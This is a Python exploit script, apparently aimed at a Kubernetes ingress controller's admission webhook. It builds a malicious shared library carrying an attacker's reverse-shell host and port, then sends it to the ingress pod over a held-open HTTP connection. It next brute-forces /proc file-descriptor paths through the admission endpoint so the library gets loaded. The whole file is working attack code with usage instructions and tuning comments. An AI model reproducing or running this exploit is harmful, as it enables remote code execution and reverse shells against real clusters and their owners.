import requests import sys from urllib.parse import urlparse import threading from concurrent.futures import ThreadPoolExecutor import urllib3 import socket import os urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def create_lib(host, port): lib_code = open("lib_template.c", "r").read() lib_code = lib_code.replace("HOST", host) lib_code = lib_code.replace("PORT", str(port)) with open("evil_engine.c", "w") as f: f.write(lib_code) f.close() process = os.system("gcc -fPIC -Wall -shared -o evil_engine.so evil_engine.c -lcrypto") if process == 0: print("[+] Shared object compiled successfully") return True else: print("[+] Error compiling shared object - gcc is installed?") sys.exit(0) def send_request(admission_url, json_data, proc, fd): print(f"Trying Proc: {proc}, FD: {fd}") path = f"proc/{proc}/fd/{fd}" replaced_data = json_data.replace("REPLACE", path) headers = { "Content-Type": "application/json" } full_url = admission_url.rstrip("/") + "/admission" try: response = requests.post(full_url, data=replaced_data, headers=headers, verify=False, timeout=5) #print(response.text) - use this to debug (check response of admission webhook) print(f"Response for /proc/{proc}/fd/{fd}: {response.status_code}") except Exception as e: print(f"Error on /proc/{proc}/fd/{fd}: {e}") def admission_brute(admission_url, max_workers=3): # before use review.json file, check if alico-system/node-certs exists on the cluster. with open("review.json", "r") as f: json_data = f.read() #proc = input("INPUT PROC:") - use this for manual testing #fd = input("INPUT FD:") - use this for manual testing #send_request(admission_url, json_data, proc, fd) - use this for manual testing with ThreadPoolExecutor(max_workers=max_workers) as executor: for proc in range(1, 50): # can be increased to 100 for fd in range(3, 30): # can be increased to 100 (not recommended) executor.submit(send_request, admission_url, json_data, proc, fd) def exploit(ingress_url): with open("evil_engine.so", "rb") as f: evil_engine = f.read() real_length = len(evil_engine) fake_length = real_length + 10 url = ingress_url parsed = urlparse(url) host = parsed.hostname port = parsed.port or 80 path = parsed.path or "/" try: sock = socket.create_connection((host, port)) except Exception as e: print(f"Error connecting to {host}:{port}: {e} - host is up?") sys.exit(0) headers = ( f"POST {path} HTTP/1.1\r\n" f"Host: {host}\r\n" f"User-Agent: qmx-ingress-exploiter\r\n" f"Content-Type: application/octet-stream\r\n" f"Content-Length: {fake_length}\r\n" f"Connection: keep-alive\r\n" f"\r\n" ).encode("iso-8859-1") http_payload = headers + evil_engine sock.sendall(http_payload) response = b"" while True: chunk = sock.recv(4096) if not chunk: break response += chunk print("[*] Resposta:") print(response.decode(errors="ignore")) sock.close() if len(sys.argv) < 4: print("Usage: python3 exploit.py ") sys.exit(0) else: ingress_url = sys.argv[1] admission = sys.argv[2] if ":" not in sys.argv[3]: print("Invalid rev_host:port") sys.exit(0) host = sys.argv[3].split(":")[0] port = sys.argv[3].split(":")[1] result = create_lib(host, port) if result: # Send the library to the ingress pod and keep the connection open to keep the file open via the file descriptor (FD). x = threading.Thread(target=exploit, args=(ingress_url,)) x.start() admission_brute(admission) # start the admission webhook brute force (/proc/{pid}/fd/{fd})